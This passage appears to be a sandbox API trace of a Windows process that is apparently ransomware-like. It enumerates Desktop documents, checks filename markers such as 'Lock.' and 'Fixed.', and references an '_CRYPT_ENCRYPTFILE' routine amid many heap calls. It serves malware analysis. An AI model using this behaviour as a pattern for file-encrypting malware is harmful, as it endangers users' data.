nFileSizeHigh=0x0, nFileSizeLow=0x9c99, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="xTq6MCScdpqJ.odt", cAlternateFileName="XTQ6MC~1.ODT")) returned 0 [0212.494] FindClose (in: hFindFile=0xa87310 | out: hFindFile=0xa87310) returned 1 [0212.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0212.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0212.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0212.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0212.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0212.495] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0212.495] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0212.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0212.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0212.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0212.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0212.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0212.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0212.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0212.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0212.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e563a8 [0212.496] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/xTq6MCScdpqJ.odt", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\xTq6MCScdpqJ.odt", lpFilePart=0x8cf650*="xTq6MCScdpqJ.odt") returned 0x28 [0212.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0212.496] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\xTq6MCScdpqJ.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\xtq6mcscdpqj.odt")) returned 0xffffffff [0212.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0212.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0212.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0212.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0212.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0212.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0212.496] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0212.496] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.496] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0212.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0212.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0212.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0212.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0212.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0212.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0212.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0212.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0212.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0212.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0212.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0212.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0212.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xwkMqwHw2FNJUh0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wkMqwHw2FNJUh0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kMqwHw2FNJUh0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MqwHw2FNJUh0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qwHw2FNJUh0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wHw2FNJUh0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hw2FNJUh0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w2FNJUh0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2FNJUh0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FNJUh0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NJUh0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JUh0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uh0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0212.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0212.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0212.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0212.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0212.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0212.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0212.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0212.498] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0212.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0212.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0212.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0212.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x28) returned 0x977db8 [0212.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0212.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xwkMqwHw2FNJUh0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wkMqwHw2FNJUh0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kMqwHw2FNJUh0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MqwHw2FNJUh0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qwHw2FNJUh0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wHw2FNJUh0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hw2FNJUh0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w2FNJUh0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2FNJUh0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FNJUh0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NJUh0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JUh0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uh0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h0.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0212.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0212.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0212.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0212.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0212.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0212.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0212.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0212.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0212.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0212.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0212.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0212.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0212.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0212.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0212.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0212.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0212.500] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0212.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0212.501] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0212.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0212.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0212.501] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0212.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0212.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0212.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0212.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0212.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0212.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0212.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0212.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0212.502] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0212.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0212.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0212.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0212.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0212.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0212.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0212.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0212.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53728 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0212.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0212.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0212.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0212.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0212.503] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0212.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0212.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0212.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 